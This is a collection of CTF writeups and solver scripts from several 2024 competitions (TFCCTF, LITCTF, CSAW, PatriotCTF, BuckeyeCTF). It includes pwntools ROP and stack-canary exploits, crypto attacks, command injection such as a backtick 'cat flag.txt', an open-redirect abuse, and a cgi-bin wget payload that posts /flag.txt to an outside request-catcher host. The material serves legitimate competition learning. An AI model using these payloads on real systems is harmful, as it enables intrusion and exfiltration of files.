/2024_08_03_TFCCTF24/crypto/genetics/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | with open("task.txt", "r") as f: 4 | c = f.read() 5 | 6 | c = c.replace(" ", "") 7 | c = c.replace("\n", "") 8 | 9 | c = c.replace("A", "0") 10 | c = c.replace("C", "1") 11 | c = c.replace("G", "2") 12 | c = c.replace("T", "3") 13 | 14 | flag = "" 15 | 16 | for i in range(0, len(c), 4): 17 | flag += chr(int(c[i:i+4], 4)) 18 | 19 | print(flag) # TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n} -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/genetics/task.txt: -------------------------------------------------------------------------------- 1 | CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC 2 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/genetics/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # Genetics (crypto) 4 | 5 | I just took a quick look at my DNA. I feel like I was created for this CTF. 6 | 7 | CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC 8 | 9 | ## Analysis 10 | 11 | The given text appears similar to the most common [DNA digital data store encoding](https://en.wikipedia.org/wiki/DNA_digital_data_storage). 12 | 13 | This is a base 4 encoding. 14 | 15 | ## Solution 16 | 17 | 1) Convert the letter symbols to number symbols 18 | 2) Convert the numbers to base 10 from base 4 19 | 20 | ```python 21 | #!/usr/bin/env python3 22 | 23 | with open("task.txt", "r") as f: 24 | c = f.read() 25 | 26 | c = c.replace(" ", "") 27 | c = c.replace("\n", "") 28 | 29 | c = c.replace("A", "0") 30 | c = c.replace("C", "1") 31 | c = c.replace("G", "2") 32 | c = c.replace("T", "3") 33 | 34 | flag = "" 35 | 36 | for i in range(0, len(c), 4): 37 | flag += chr(int(c[i:i+4], 4)) 38 | 39 | print(flag) # TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n} 40 | ``` 41 | 42 | ## Flag 43 | `TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n}` 44 | 45 | smiley 2024/08/03 46 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/pwn/guard_the_bypass/chall.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/pwn/guard_the_bypass/chall.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/pwn/guard_the_bypass/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | context.log_level = "debug" 6 | elf = ELF("./guard_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | p = elf.process() 12 | #p = elf.debug(gdbscript="b *0x401384") 13 | #p = remote("challs.tfcctf.com", 31735) 14 | 15 | p.sendlineafter(b"Welcome! Press 1 to start the chall.\n", b"1") 16 | 17 | rop = ROP(elf) 18 | rop.raw(b"A" * 56) 19 | rop.puts(elf.got["puts"]) 20 | rop.raw(elf.sym["game"]) 21 | rop.raw(b"A" * (2096 - len(rop.chain()))) 22 | rop.raw(p64(0x3fe000)) # writable bss 23 | rop.raw(b"A" * 24) 24 | chain = rop.chain() 25 | p.sendlineafter(b"Select the len: ", str(len(chain)).encode()) 26 | p.sendline(chain) 27 | 28 | leak = struct.unpack(" 2 | #include 3 | #include 4 | #include 5 | 6 | #define NUM_WORKERS (16) 7 | 8 | void* worker(void *arg) { 9 | time_t start = (time_t)arg; 10 | char cmd[512]; 11 | sprintf(cmd, "./worker %ld %d", start, NUM_WORKERS); 12 | int rc = system(cmd); 13 | (void)rc; 14 | pthread_exit(0); 15 | } 16 | 17 | int main(int argc, char** argv) { 18 | pthread_t threads[NUM_WORKERS]; 19 | 20 | time_t now = time(0); 21 | 22 | for (int i = 0; i < NUM_WORKERS; i++) { 23 | pthread_create(&threads[i], 0, worker, (void*)(now - i)); 24 | } 25 | 26 | for (int i = 0; i < NUM_WORKERS; i++) { 27 | pthread_join(threads[i], 0); 28 | } 29 | 30 | return 0; 31 | } -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/inscount.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import string 4 | from pwn import * 5 | 6 | PIN = "/opt/pin/pin" 7 | INSCOUNT2_MT_SO = "/opt/pin/source/tools/SimpleExamples/obj-intel64/inscount2_mt.so" 8 | BINARY = "./signal" 9 | 10 | flag = b"" 11 | #flag = b"b11e800000b27dcf82e70c4bad63a3eb" 12 | 13 | while True: 14 | highest_count = 0 15 | best_byte = b"\x00" 16 | for c in "10fedcba98765432": 17 | b = c.encode() 18 | with process(argv=[PIN, "-t", INSCOUNT2_MT_SO, "--", BINARY, flag + b], level="CRITICAL") as p: 19 | lines = p.recvall().split(b"\n") 20 | 21 | count = 0 22 | for line in lines: 23 | if b"Count[" in line: 24 | count += int(line.split(b" = ")[1]) 25 | 26 | if count > highest_count: 27 | highest_count = count 28 | best_byte = b 29 | flag += best_byte 30 | log.success(flag.decode()) 31 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/signal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/rev/signal/signal -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/worker.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char const* alpha = "abcdef0123456789"; 7 | 8 | int main(int argc, char** argv) { 9 | char flag[32]; 10 | time_t start = (time_t)atoi(argv[1]); 11 | int step = atoi(argv[2]); 12 | time_t now = start; 13 | 14 | printf("start: %ld step: %d\n", start, step); 15 | 16 | for ( ; ; ) { 17 | srand(now); 18 | for (int i = 0; i < 32; i++) 19 | flag[i] = alpha[rand() & 0xf]; 20 | if (memcmp(flag, "b11e8", 5) == 0) { 21 | if (memcmp(&flag[10], "b27dc", 5) == 0) { 22 | printf("[%s]\n", flag); 23 | if (memcmp(&flag[10], "b27dcf82e70c4bad63a3eb", 22) == 0) { 24 | printf("%s\n", flag); // TFCCTF{b11e807f65b27dcf82e70c4bad63a3eb} 25 | break; 26 | } 27 | } 28 | } 29 | now -= step; 30 | } 31 | return 0; 32 | } -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/web/funny/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # funny (web) 4 | 5 | cgi-bin stuff 6 | 7 | ## Solution 8 | 9 | ```conf 10 | ScriptAlias /cgi-bin /usr/bin 11 | ``` 12 | Allows us to execute any binary on the dir with http path. 13 | It took some trial and error to get it working, i wonder if you can solve it with awk 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | import requests 18 | from urllib.parse import quote, quote_plus 19 | 20 | REMOTE = "http://challs.tfcctf.com:31311/" 21 | 22 | payload = f"wget?--post-file+/flag.txt+https://lalalalalallalala.requestcatcher.com/" 23 | res = requests.get(REMOTE + f"cgi-bin/{payload}", proxies={ 24 | 'http': 'http://0.0.0.0:8080', 25 | 'https': 'https://0.0.0.0:8080' 26 | }) 27 | print(res.text) 28 | ``` 29 | 30 | ## Flag 31 | `TFCCTF{1_4lm0st_f0rg0t_t0_push_th1s_fl4g_t0_th3_c0nt4in3r}` 32 | 33 | shafouz 2024/08/03 34 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/web/surfing/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # surfing (web) 4 | 5 | Google redirects 6 | 7 | ## Solution 8 | 9 | Very interesting challenge, basically you send an email on gmail to yourself to get the usg parameter. 10 | Then you can use google as a open-redirect. 11 | `#` at the end is needed for some reason. 12 | 13 | ```python 14 | import requests 15 | from urllib.parse import quote_plus, quote 16 | 17 | part2 = "https://ca14-2804-1b3-8146-8451-d3ef-cb85-2b79-23d7.ngrok-free.app&source=gmail&ust=1722697936722000&usg=AOvVaw3Djb1BbeFhNoc5_At0Cbfe#" 18 | part2 = quote_plus(part2) 19 | payload = "http://google.com/url?q=" + part2 20 | 21 | burp0_url = "http://challs.tfcctf.com:31595/get" 22 | 23 | res = requests.get(burp0_url, params=f'url={payload}', proxies={ 24 | 'http': 'http://0.0.0.0:8080', 25 | 'https': 'https://0.0.0.0:8080' 26 | }) 27 | print(f"DEBUGPRINT[1]: go.py:6: res.text={res.text}") 28 | 29 | 30 | ``` 31 | 32 | ## Flag 33 | `TFCCTF{18fd102247cb73e9f9acaa42801ad03cf622ca1c3689e4969affcb128769d0bc}` 34 | 35 | shafouz 2024/08/03 36 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/README.md: -------------------------------------------------------------------------------- 1 | # LITCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2444 4 | 5 | 604th place 333 points 6 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/crypto/chal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from Crypto.Util.number import long_to_bytes as ltb, bytes_to_long as btl, getPrime 3 | 4 | p = getPrime(1024) 5 | q = getPrime(1024) 6 | 7 | n = p*q 8 | 9 | e = p 10 | 11 | with open("flag.txt", "rb") as f: 12 | PT = btl(f.read()) 13 | 14 | CT = pow(PT, e, n) 15 | print(f"{CT = }") 16 | 17 | for _ in range(4): 18 | CT = pow(int(input("Plaintext: ")), e, n) 19 | print(f"{CT = }") 20 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/crypto/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from math import gcd 5 | 6 | def modinv(a, m): 7 | return pow(a, -1, m) 8 | 9 | #context.log_level = "debug" 10 | 11 | #p = remote("litctf.org", 31783) 12 | p = process(["python3", "./chal.py"]) 13 | 14 | p.readuntil(b"CT = ") 15 | flag_ciphertext = int(p.readline()) 16 | 17 | p.sendlineafter(b"Plaintext: ", str(-1).encode()) 18 | p.readuntil(b"CT = ") 19 | n = int(p.readline()) + 1 20 | 21 | m1 = 21 22 | p.sendlineafter(b"Plaintext: ", str(m1).encode()) 23 | p.readuntil(b"CT = ") 24 | c1 = int(p.readline()) 25 | 26 | m2 = 22 27 | p.sendlineafter(b"Plaintext: ", str(m2).encode()) 28 | p.readuntil(b"CT = ") 29 | c2 = int(p.readline()) 30 | 31 | # sometimes we get e * 2 instead of e 32 | e = gcd(m1 - c1, m2 - c2) 33 | d = modinv(e, (e - 1) * ((n // e) - 1)) 34 | 35 | # so.. sometimes this doesn't work 36 | flag = pow(flag_ciphertext, d, n) 37 | flag = flag.to_bytes(length=(flag.bit_length() + 7) // 8, byteorder="big") 38 | 39 | log.success(flag.decode()) 40 | 41 | -------------------------------------------------------------------------------- /2024_08_17_idekCTF24/README.md: -------------------------------------------------------------------------------- 1 | # idekCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2304 4 | 752nd place 100 points 5 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals 2024 Writeups 2 | 3 | https://ctftime.org/event/2398 4 | 5 | 225th place 1208 points 6 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/cbc/app.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad, unpad 2 | from Crypto.Cipher import AES 3 | import os 4 | 5 | def decrypt(txt: str) -> (str, int): 6 | try: 7 | token = bytes.fromhex(txt) 8 | 9 | c = AES.new(os.environ["AES_KEY"].encode(), AES.MODE_CBC, iv=os.environ["AES_IV"].encode()) 10 | plaintext = c.decrypt(token) 11 | unpadded = unpad(plaintext, 16) 12 | 13 | return unpadded, 1 14 | except Exception as s: 15 | return str(s), 0 16 | 17 | def main() -> None: 18 | while True: 19 | text = input("Please enter the ciphertext: ") 20 | text.strip() 21 | out, status = decrypt(text) 22 | if status == 1: 23 | print("Looks fine") 24 | else: 25 | print("Error...") 26 | 27 | if __name__ == "__main__": 28 | main() 29 | 30 | 31 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/msg1.enc: -------------------------------------------------------------------------------- 1 | c = 161657267735196834912863135763588255051084768060167522685145600975477606522389267911595494255951389308603585891670155516473228040572472139266242046480464411011926872432857745283026840801445383620653451687523682849171134262795620963422201106957732644189004161198543408780876818402717692426183521358742475772803427948145681912577138151854201287217310388360035006450255979612146528569192238510701666997268424852524879191797074298541592238357746219444160311336448978081899531731524195638715227224903445226248602579764214997719090230906191407229446647313099400956970509035654967405630240939959592998616003498236942092817559461000588623573048030445521863492730870242644395352424593752773001495951737895664115609421618170689951704330184048125307163740226054228480085636314748554185748105182003072934516641741388554856693783207538862673881733984454590126630762754413784860309730736733101522402317095930278893263812433036953457501549714213711757368647750210251899325644773678135753158374375837529620580830355398764871600754340989211159192515899566042173210432362519000596760898915443009768635625263875643978408948502726014770826616858752941269838500371205265923373317700072776319154266968103160778573051363936325056002056286215658714259892131 2 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/msg2.enc: -------------------------------------------------------------------------------- 1 | c = 494623168173341363340467373358957745383595056417571755948370162317759417390186160270770025384341351293889439841723113891870589515038055355274713359875028285461281491108349357922761267441245606066321766119545935676079271349094728585175909045924367012097484771776396598141703907624715907730873180080611197080012999970125893693838478647963157490065546947042621326070901482489910203413759703603136944502613002083194569025640046380564488058425650504612206627739749051853591610981053026318569730551988841304231276711969977298162726941928222523464544797141812329957714866356009363861914935745207975118182966833811723664044706845207847731129336219505772833893718601825819419057471717431953601897992835582033908346998397116046369365580899868759006665351628889935594587647946796811554073758809039163703319444890860711787316692186294350180062910771860180483152240985537326837665737974072086105081591429007858987697382766650868798693024212101169297652870122729568327958629779258375463408029863902774673729692698603549762248768090302360950262068792179771304874203556781584256503067131440856389473604578859795120178476492827306744971082872861030028803971595639553063854220185280566575307797482645881434704155764917254239587927218075951473385530833 2 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/public_key1: -------------------------------------------------------------------------------- 1 | e = 65537 2 | n = 537269810177819460077689661554997290782982019008162377330038831815573146869875494409546502741769078888560119836988893807659619131795600022996155542011901767164659622251852771410530047820953404275439162903782253582402317577272023052873061733154947413969140900242586288282386516940748102303139488999388815366805771566027048823971232923901589854972341140497344922557809346957285480088567527430942352224246175865278666886538920772608403444601667114300055814252644535406924681931233694920723837668899531758291081568304763353729111948368345349994099868469305792181073122419940610781784779666456780500932337154438538720823939250386789917476722260336949625831449027815346423132208841389383282133423240342633209093536658578807788187537292687621305485734565276685038174693348234827761258142100019798785254244633108887403538365377022084266245064851786520352683721896084403163679116876924559581709943841877168418550922700610256010165841228197765129411475811684669156709601802234298096100301516880419138890353002776631827361005170877640327516465104169299292924318171783865084478980121378972145656688829725118773293892358855082049175572479466474304782889913529927629420886850515337785270820884245044809646784251398955378537462225157041205713008379 -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/public_key2: -------------------------------------------------------------------------------- 1 | e = 65537 2 | n = 675112413040615754855341368347991520700645749707972662375138119848808538466484973026629442817490775679486087477873647170707728077849174294413106449041183548981099164777126469098349759962366886352375485394430924686294932854410357033579891793697466117311282071223849125728247324019661552591602816412461639181036083039951358738639409104870090776274099206184327026885209301129700589120263558741373320717866973004474880824451611558352986814186406024139122101780061421498582804842387331594088633719788918481809465044314609904522824483927173924396330723272200351268059583559155873089840203176526189465332287149408627146863937339106591410131104971158916770664709755851365697530033135116269758729627681863469646687585133174854282299126206393656205822175860114547244407037919126445577158000448033562711159480289599400271620922791664179514807098083591794558148460941940996477066832640360820650342057071277962750427121243576612067919616033880922920641430414655749007393524344586517489346008845986135281381956392366857764758769758991862758292829265731964283719870708510272500471228442964550074672417445262035130720875562744233719280755235051883245392409892775011413342074824090752055820699150296553380118608786447588243723987854862785887828651597 -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/README.md: -------------------------------------------------------------------------------- 1 | # PatriotCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2426/ 4 | 5 | 229th place 1880 points 6 | 7 | -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/bit_by_bit/transmit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | 4 | blocksize = 16 5 | 6 | def loadMessage(): 7 | message = "" 8 | with open("message.txt","r",encoding='utf-8') as file: 9 | for line in file: 10 | message += line 11 | while len(message) % blocksize != 0: 12 | message += '0' 13 | return message 14 | 15 | def encode(chunk): 16 | start = 120 17 | encoded = 0 18 | for c in chunk: 19 | encoded = encoded | (ord(c)< ", plaintext) 11 | p.readuntil(b"> ") 12 | return bytes.fromhex(p.readline().decode()) 13 | 14 | def get_next_byte(flag): 15 | prefix_len = (16 - (1 + len(flag))) % 16 16 | prefix = b'A' * prefix_len 17 | length = prefix_len + len(flag) + 1 18 | ciphertext = encrypt(prefix) 19 | for c in printable: 20 | fake = encrypt(prefix + flag + bytes([ord(c)])) 21 | if fake[:length] == ciphertext[:length]: 22 | return bytes([ord(c)]) 23 | return b'' 24 | 25 | flag = b"" 26 | for i in range(32): 27 | flag += get_next_byte(flag) 28 | print(flag.decode()) # pctf{ab8zf58} 29 | -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/high_roller/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_20_PatriotCTF/crypto/high_roller/flag.enc -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/high_roller/gen_setup.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_20_PatriotCTF/crypto/high_roller/gen_setup.7z -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/idk_cipher/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from base64 import b64decode 4 | from struct import pack 5 | 6 | key = b"secretkey" 7 | ciphertext = b64decode(b"QRVWUFdWEUpdXEVGCF8DVEoYEEIBBlEAE0dQAURFD1I=") 8 | 9 | x = b"" 10 | key_idx = 0 11 | 12 | for i in range(0, len(ciphertext), 2): 13 | x += pack("B", ciphertext[i] ^ key[key_idx]) 14 | key_idx = (key_idx + 1) % len(key) 15 | 16 | y = b"" 17 | key_idx = 0 18 | 19 | for i in range(1, len(ciphertext), 2): 20 | y += pack("B", ciphertext[i] ^ key[key_idx]) 21 | key_idx = (key_idx + 1) % len(key) 22 | 23 | flag = b"pctf{" + x + y[::-1] + b"}" 24 | 25 | print(flag.decode()) # pctf{234c81cf3cd2a50d91d5cc1a1429855f} 26 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/README.md: -------------------------------------------------------------------------------- 1 | # BuckeyeCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2449 4 | 5 | 155th place 720 points 6 | 7 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/hashbrown/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from Crypto.Cipher import AES 5 | 6 | #context.log_level = "debug" 7 | p = remote("challs.pwnoh.io", 13419) 8 | 9 | p.readuntil(b"hex:\n") 10 | message = bytes.fromhex(p.readline().decode()) 11 | message += b"_" * (16 - len(message) % 16) 12 | 13 | p.readuntil(b"Signature:\n") 14 | key = bytes.fromhex(p.readline().decode()[-33:-1]) 15 | 16 | french_fry = b"french fry" 17 | padded_french_fry = french_fry + (b"_" * (16 - len(french_fry) % 16)) 18 | 19 | p.sendlineafter(b"> ", (message + french_fry).hex().encode()) 20 | 21 | forgery = AES.new(key, AES.MODE_ECB).encrypt(padded_french_fry) 22 | p.sendlineafter(b"> ", forgery.hex().encode()) 23 | 24 | p.readuntil(b"flag:\n") 25 | 26 | # bctf{e7ym0l0gy_f4c7_7h3_w0rd_hash_c0m35_fr0m_7h3_fr3nch_hacher_wh1ch_m34n5_t0_h4ck_0r_ch0p} 27 | print(p.readline().decode()[:-1]) 28 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | e = 65537 4 | n = 66082519841206442253261420880518905643648844231755824847819839195516869801231 5 | c = 19146395818313260878394498164948015155839880044374872805448779372117637653026 6 | 7 | # https://factordb.com/index.php?query=66082519841206442253261420880518905643648844231755824847819839195516869801231 8 | # 9 | # can also factor with sage in ~3 minutes on my machine 10 | # sage: n = 66082519841206442253261420880518905643648844231755824847819839195516869801231 11 | # sage: n.factor() 12 | # 213055785127022839309619937270901673863 * 310165339100312907369816767764432814137 13 | 14 | p = 213055785127022839309619937270901673863 15 | q = 310165339100312907369816767764432814137 16 | assert((p * q) == n) 17 | 18 | phi = (p - 1) * (q - 1) 19 | d = pow(e, -1, phi) 20 | 21 | m = pow(c, d, n) 22 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8, byteorder="big").decode() 23 | print(flag) # bctf{f4c70r1z3_b3773r_4d3b35e4} 24 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/rsa/rsa.py: -------------------------------------------------------------------------------- 1 | import Crypto.Util.number as cun 2 | import math 3 | 4 | message = b"bctf{fake_flag}" 5 | 6 | m = int.from_bytes(message, "big") 7 | 8 | p = cun.getPrime(128) 9 | q = cun.getPrime(128) 10 | e = 65537 11 | 12 | n = p * q 13 | phi = (p - 1) * (q - 1) 14 | d = pow(e, -1, phi) 15 | assert (e * d) % phi == 1 16 | assert math.gcd(e, phi) == 1 17 | 18 | c = pow(m, e, n) 19 | 20 | print(f"e = {e}") 21 | print(f"n = {n}") 22 | print(f"c = {c}") 23 | 24 | """ 25 | Output: 26 | e = 65537 27 | n = 66082519841206442253261420880518905643648844231755824847819839195516869801231 28 | c = 19146395818313260878394498164948015155839880044374872805448779372117637653026 29 | """ 30 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from xnor import * 4 | 5 | message = b'Blue is greener than purple for sure!' 6 | message_enc = bytes.fromhex("fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8") 7 | key = xnor_bytes(message_enc, message) 8 | 9 | flag_enc = bytes.fromhex("de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4") 10 | flag = xnor_bytes(flag_enc, key) 11 | 12 | print(flag.decode()) # bctf{why_xn0r_y0u_b31ng_so_3xclu51v3} 13 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # xnor (crypto) 4 | 5 | XNOR! Its like XOR, but its actually the complete opposite. 6 | 7 | ## Analysis 8 | 9 | We are given a the result of encrypting both a known plaintext and a flag with the same key. The method of encryption is to apply the xnor operation to each bit. 10 | 11 | ## Solution 12 | 13 | 1) Recover the key by xnoring the encrypted message with the known plaintext 14 | 2) Recover the flag by xnoring the encrypted flag with the key 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | 19 | from xnor import * 20 | 21 | message = b'Blue is greener than purple for sure!' 22 | message_enc = bytes.fromhex("fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8") 23 | key = xnor_bytes(message_enc, message) 24 | 25 | flag_enc = bytes.fromhex("de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4") 26 | flag = xnor_bytes(flag_enc, key) 27 | 28 | print(flag.decode()) # bctf{why_xn0r_y0u_b31ng_so_3xclu51v3} 29 | ``` 30 | 31 | ## Flag 32 | `bctf{why_xn0r_y0u_b31ng_so_3xclu51v3}` 33 | 34 | smiley 2024/09/28 35 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/xnor_output.txt: -------------------------------------------------------------------------------- 1 | Key: [[REDACTED]] 2 | 3 | Message: b'Blue is greener than purple for sure!' 4 | Enrypted message: fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8 5 | 6 | Flag: [[REDACTED]] 7 | Encrypted flag: de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4 8 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/calculator/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/calculator/calc -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/calculator/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./calc", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript=" b main") 11 | p = remote("challs.pwnoh.io", 13377) 12 | 13 | p.sendlineafter(b"operand: ", b"1") 14 | p.sendlineafter(b"operator: ", b"*") 15 | p.sendlineafter(b"operand: ", b"pi") 16 | p.sendlineafter(b" use: ", str("10016").encode()) 17 | 18 | p.readuntil(b"That is: ") 19 | line = p.readline() 20 | canary = u64(line[-11:-3]) 21 | 22 | payload = b"" 23 | payload += b"A" * 0x28 24 | payload += p64(canary) 25 | payload += p64(0) 26 | payload += p64(elf.sym["win"] + 0x17) 27 | p.sendline(payload) 28 | 29 | p.readuntil(b"here: ") 30 | 31 | p.sendline(b"/bin/cat flag.txt") 32 | 33 | p.interactive() # bctf{cAn4r13S_L0v3_t0_34t_P13_c760f8cc0a44fed9} 34 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/color.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/color/color.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import re 5 | 6 | #context.log_level = "debug" 7 | p = remote("challs.pwnoh.io", 13370) 8 | 9 | p.sendline(b"A" * 0x20) 10 | 11 | # bctf{1_d0n7_c4r3_571ll_4_m1d_c010r} 12 | print(re.search(r"bctf{.+}", p.readline().decode())[0]) 13 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/color/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # color (pwn) 4 | 5 | What's your favorite color? 6 | 7 | nc challs.pwnoh.io 13370 8 | 9 | ## Analysis 10 | 11 | We can see that these two buffers are adjacent such that if `FAVORITE_COLOR` contained `b"A" * 20` string based operations which assume the presense of a null terminator would treat both buffers as a single string: 12 | 13 | ```C 14 | char FAVORITE_COLOR[0x20]; 15 | char FLAG[0x28]; 16 | ``` 17 | 18 | ## Solution 19 | 20 | 1) Set `FAVORITE_COLOR` to `b"A" * 20` 21 | 2) Allow `printf("%s!?!? Mid af color\n", FAVORITE_COLOR);` to print the flag 22 | 23 | ```python 24 | #!/usr/bin/env python3 25 | 26 | from pwn import * 27 | import re 28 | 29 | #context.log_level = "debug" 30 | p = remote("challs.pwnoh.io", 13370) 31 | 32 | p.sendline(b"A" * 0x20) 33 | 34 | # bctf{1_d0n7_c4r3_571ll_4_m1d_c010r} 35 | print(re.search(r"bctf{.+}", p.readline().decode())[0]) 36 | ``` 37 | 38 | ## Flag 39 | `bctf{1_d0n7_c4r3_571ll_4_m1d_c010r}` 40 | 41 | smiley 2024/09/29 42 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/no_handouts/no_handouts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/no_handouts/no_handouts.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("challs.pwnoh.io", 13400) 7 | 8 | p.sendline(b"`cat flag.txt`") 9 | 10 | p.interactive() # bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e} 11 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/runway0.zip: -------------------------------------------------------------------------------- 